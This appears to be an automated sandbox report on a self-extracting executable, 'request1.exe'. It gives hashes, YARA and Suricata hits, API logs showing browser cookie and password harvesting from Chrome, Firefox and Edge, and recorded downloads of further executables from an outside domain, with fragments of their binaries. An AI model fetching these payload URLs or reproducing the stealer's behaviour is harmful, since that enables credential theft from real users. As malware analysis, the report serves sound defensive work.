Summary | ZeroBOX

request1.exe

Gen1
Category Machine Started Completed
FILE s1_win7_x6402 April 23, 2021, 10:04 a.m. April 23, 2021, 10:12 a.m.
Size 2.0MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 71832d24f95c424d77fd887d9abbb0f0
SHA256 44f933c8ab6dd6894c4f8b95bf926721c9788bbe5cd4a30a11e6a216de5c8338
CRC32 C448040A
ssdeep 49152:YbA3DHbwNCkOZ8m1aQs4FPYT0q/hOjYBwIUSwAU+SC:Ybn0kSakEhelbtTC
PDB Path D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb
Yara
  • PE_Header_Zero - PE File Signature Zero
  • OS_Processor_Check_Zero - OS Processor Check Signature Zero
  • IsPE32 - (no description)
  • IsWindowsGUI - (no description)
  • IsPacked - Entropy Check
  • HasOverlay - Overlay Check
  • HasDebugData - DebugData Check
  • HasRichSignature - Rich Signature Check
  • escalate_priv - Escalade priviledges
  • screenshot - Take screenshot
  • win_registry - Affect system registries
  • win_token - Affect system token
  • win_files_operation - Affect private profile

IP Address Status Action
164.124.101.2 Active Moloch
172.217.25.14 Active Moloch
172.67.70.233 Active Moloch
35.220.162.170 Active Moloch
35.220.235.49 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 35.220.162.170:80 -> 192.168.56.102:49813 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 35.220.162.170:80 -> 192.168.56.102:49814 2014819 ET INFO Packed Executable Download Misc activity
TCP 35.220.162.170:80 -> 192.168.56.102:49814 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation

Suricata TLS

Flow Issuer Subject Fingerprint
TLS 1.2
192.168.56.102:49811
172.67.70.233:443
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com e8:2c:6d:12:8c:c5:ce:c7:42:39:90:96:aa:d5:c8:a2:5f:50:74:73

Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: browser.go:185: error Firefox find bookmark file failed, ERR:find places.sqlite failed
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: browser.go:185: error Firefox find cookie file failed, ERR:find cookies.sqlite failed
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: browser.go:185: error Firefox find history file failed, ERR:find places.sqlite failed
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: browser.go:179: error Firefox find password file failed, ERR:find logins.json failed
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: browser.go:132: error Chrome find bookmark file failed, ERR:find Bookmarks failed
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: [x]: Get 2 cookies, filename is results/chrome_cookie.json
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: [x]: Get 0 passwords, filename is results/chrome_password.json
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: cmd.go:53: error open C:\Users\test22/AppData/Local/Microsoft/Edge/User Data/Local State: The system cannot find the path specified.
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: browser.go:132: error Microsoft Edge find bookmark file failed, ERR:find Bookmarks failed
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: browser.go:132: error Microsoft Edge find cookie file failed, ERR:find Cookies failed
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: browser.go:132: error Microsoft Edge find history file failed, ERR:find History failed
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: browser.go:132: error Microsoft Edge find password file failed, ERR:find Login Data failed
console_handle: 0x0000000000000007
1 1 0
pdb_path D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb
file C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
section .didat
resource name PNG
request GET http://www.cif96be750.com/pkasdq/parse.exe
request GET http://www.cif96be750.com/pkasdq/curl.exe
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 3236
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73772000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140000000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140000000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140000000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140000000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140000000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140000000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 585728
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140001000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000014008e000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000014008e000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140000000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 409600
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140001000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 409600
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140001000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140086000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140086000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 266240
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000001401ae000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140065000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140065000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140065000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140065000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140065000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140065000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140065000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140065000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140065000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140065000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140065000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140065000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140065000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140065000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140065000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140065000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140065000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140065000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140065000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140065000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140065000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140065000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140065000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140065000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140065000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140065000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140065000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140065000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140065000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140065000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140065000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140065000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140065000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140065000
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Channel IDs
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Channel IDs-journal
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Module Info Cache
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crowd Deny
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Floc\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\PnaclTranslationCache\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies-journal
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData
file C:\Users\test22\AppData\Local\Google\Chrome\User Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\recovery\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Last Browser
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Floc
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crowd Deny\
name PNG language LANG_CHINESE filetype PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0006418c size 0x000015a9
name PNG language LANG_CHINESE filetype PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0006418c size 0x000015a9
name RT_ICON language LANG_CHINESE filetype PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0006aea8 size 0x00003d71
name RT_ICON language LANG_CHINESE filetype PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0006aea8 size 0x00003d71
name RT_ICON language LANG_CHINESE filetype PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0006aea8 size 0x00003d71
name RT_ICON language LANG_CHINESE filetype PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0006aea8 size 0x00003d71
name RT_ICON language LANG_CHINESE filetype PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0006aea8 size 0x00003d71
name RT_ICON language LANG_CHINESE filetype PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0006aea8 size 0x00003d71
name RT_ICON language LANG_CHINESE filetype PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0006aea8 size 0x00003d71
name RT_DIALOG language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0006f324 size 0x000001e6
name RT_DIALOG language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0006f324 size 0x000001e6
name RT_DIALOG language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0006f324 size 0x000001e6
name RT_DIALOG language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0006f324 size 0x000001e6
name RT_DIALOG language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0006f324 size 0x000001e6
name RT_DIALOG language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0006f324 size 0x000001e6
name RT_STRING language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0006fc3c size 0x00000078
name RT_STRING language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0006fc3c size 0x00000078
name RT_STRING language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0006fc3c size 0x00000078
name RT_STRING language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0006fc3c size 0x00000078
name RT_STRING language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0006fc3c size 0x00000078
name RT_STRING language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0006fc3c size 0x00000078
name RT_STRING language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0006fc3c size 0x00000078
name RT_STRING language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0006fc3c size 0x00000078
name RT_STRING language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0006fc3c size 0x00000078
name RT_STRING language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0006fc3c size 0x00000078
name RT_GROUP_ICON language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0006fcb4 size 0x00000068
name RT_MANIFEST language LANG_CHINESE filetype XML 1.0 document, ASCII text, with CRLF line terminators sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0006fd1c size 0x00000753
file C:\Users\test22\AppData\Local\Temp\RarSFX0\curl.exe
file C:\Users\test22\AppData\Local\Temp\RarSFX0\edge-set.reg
file C:\Users\test22\AppData\Local\Temp\RarSFX0\vcruntime140_1.dll
file C:\Users\test22\AppData\Local\Temp\RarSFX0\chrome7.bat
file C:\Users\test22\AppData\Local\Temp\RarSFX0\edge.reg
file C:\Users\test22\AppData\Local\Temp\RarSFX0\main.exe
file C:\Users\test22\AppData\Local\Temp\RarSFX0\chrome-set.reg
file C:\Users\test22\AppData\Local\Temp\RarSFX0\edge64.bat
file C:\Users\test22\AppData\Local\Temp\RarSFX0\chrome.reg
file C:\Users\test22\AppData\Local\Temp\RarSFX0\parse.exe
file C:\Users\test22\AppData\Local\Temp\RarSFX0\chrome86.bat
file C:\Users\test22\AppData\Local\Temp\RarSFX0\edge86.bat
file C:\Users\test22\AppData\Local\Temp\RarSFX0\chrome64.bat
file C:\Users\test22\AppData\Local\Temp\RarSFX0\main.exe
Time & API Arguments Status Return Repeated

recv

buffer: HTTP/1.1 200 OK Date: Fri, 23 Apr 2021 01:10:11 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Sun, 07 Mar 2021 21:18:22 GMT ETag: "723900-5bcf8db608380" Accept-Ranges: bytes Content-Length: 7485696 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEd†åkí_àéR7ð' é @p £ár  Õ¯SP  0V¨T(.textîìLàpà.sedata@î2òL è.idataP $i@È.sedata` (i@@‘¯ìNo0r¦Jޕ¦§| pÄùȪ¿ù2¢E3k)||5KcìX8>+Ð|Z˜†JÉr®eiW݄¥ì.a‘ÞV΢P¸Â>¿ð?íT}ÌK3kÄÏï¯f8ž¦Ò»(IÚßÂw-^S̶8ëûʹ^þë؏âÅÁ’²×gÐl‘h“<™eí4>»Ók^|}Ðc0TzT+þl±l5¢«¨¹$EÔÖ% ݈î3R:#—2¯“—þñž¶›²LìöO!PÌýã Wè½åþ–’kŽr0±â™b¯¨îØ"ÓT÷B‹R²4ل—ÍÐoÂXÅïò¿°?©|ÇK€cö]‹PÈm}ƒ yµ_s9j­w}I+¯‘T€èpÀä ¢TñkyÝÌÀ|iÅÓV’qTÉì­Äyh…¨†Cî ¯´m4•íÙ±¨…ù8¾‹›Ð{ïY7lÖ'Á.½'AÁ‹á&«ÊøFÛð]Œx*Cÿ§Á;ƒ•!LªÝ¦è˜FJ0š©êø[i~ÓÇþV'Þªdm¯¼† n||¢ÍT|*ù®Œ9õÿÅø•F œô1aº·üö°ý‹Öøæ z‚Ú´H§d”7¤œsô³¢^hk­5”°Ma-H´’"Æ9j«^6Òæ ½¶)\äd ?ʀP¤×çV€Üž{jë"Î ¿‘•6Àg“¬ÕúqÞºÉ i"r‹ãepD ,6js¶€= S&‹Ùc¼eËÕè.fþ‡¸£ŽÒ'î¨ÏWœ) IÖ+[D£©+¹ä €ò6ùË(Êo¬¾@-‚•\¡«Þ0Ú1hFcuYb‹yÆvNŸ!#¬Â²h·A«"‰2yd\"ÿtºLô¸½÷Ú!ÞRJQ¹µý!zþÞ{‹ØŒ˜.TYú$K?§qÒÊDƒN·U {×E8Kþڍ@˦³ïáÛÃNª%€®Ø…9?˜ ~‹lãoJFƒýæð„Ó¿älÐyÉÏÈïZç1HQbhPɏ ¯v]ˆÌ—@ž®è#û+'ï•°áØM°F|µpŸ¶éð1LOʲ‹Ï®l)Üü$÷x×A’s‡aif@tÖÒýÌö†Žš„íG £ªÕ¸À>Âý…~˜}S-rg…ìÏ˾A[rů,ɋ¡ˆ×Ý-Dߨ“”3:‚ñ+& (LMRù5,úºÐèÆ)2¿xÅqÝ5jZ%õ¢µ—JsÔNc »«÷˜jùðu1ÝgâPU“2“—ô}‹ª/ol‚G³«á^ë
received: 2840
socket: 252
1 2840 0

recv

buffer: HTTP/1.1 200 OK Date: Fri, 23 Apr 2021 01:10:13 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Sat, 27 Feb 2021 16:12:36 GMT ETag: "431278-5bc53a723c500" Accept-Ranges: bytes Content-Length: 4395640 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEd† wqÐ_ð. #1ôBR@ÀCXÈC` ÐB1àB€*0C@P?¤Cx@CÐv`,?(<êBˆ .textˆò01`Ð`.datapW1X1@`À.rdatapÞ p1à h1@p@.pdata¤P?’H?@0@.xdata¸wð@xÚ@@@@.bsspQpB€`À.edata1ÐBRB@0@.idata€*àB,TB@0À.CRThC€B@@À.tls C‚B@@À.rsrc@0C„B@0À.relocÐv@CxŒB@0B
received: 2840
socket: 252
1 2840 0
